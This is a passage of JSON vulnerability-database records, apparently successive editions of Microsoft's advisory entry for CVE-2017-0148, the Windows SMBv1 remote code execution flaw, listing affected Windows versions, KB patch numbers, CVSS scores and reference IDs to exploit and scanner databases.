(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:58:50", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T20:44:44", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3205409", "KB4012215", "KB3213986", "KBMS16-110, 3187754", "KB3210721", "KB4013429", "KB4013198", "KB4012214", "KB3177186", "KB4012213", "KB4012212", "KB3205401", "KB4012598", "KB4012216", "KB3210720", "KB3212646", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:44:44", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T08:48:00", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T08:48:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T08:48:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", 
"KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": 